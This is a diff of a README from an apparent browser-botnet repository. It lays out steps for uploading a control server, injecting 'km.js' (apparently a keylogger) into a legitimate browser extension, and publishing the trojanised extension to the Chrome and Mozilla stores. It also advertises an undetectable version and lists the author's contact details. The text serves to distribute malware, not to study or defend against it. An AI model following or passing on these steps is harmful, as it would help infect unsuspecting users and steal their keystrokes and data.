hakanonymos/botnet-browser-chrome/README.md

 2) send folder named " server "   to your web server , test with wampserver or xhampp ......etc

-3) take a legitimate extension then add your "km.js","jquery-3.1.1", if you have questions how does it work ask me in comment
+3) take a legitimate extension then add  "km.js","jquery-3.1.1", if you have questions how does it work ask me in comment

 4) publish your extension one chrome web store or adon mozilla

 # waring !!!!!!!
-# skype,whatsapp Email : hakanonymos@hotmail.com # ICQ : hakanonymos # whatsapp  +1 315 636 6596 (fake whatsapp )
+# whatsapp, Email,ICQ :  +1 315 636 6596 (fake whatsapp ) , hakanonymos@hotmail.com #ICQ : hakanonymos
 this is older version of javascript but new version php,if you need a fud version contact me
 # I am in no way responsible for your actions, you risk going to prison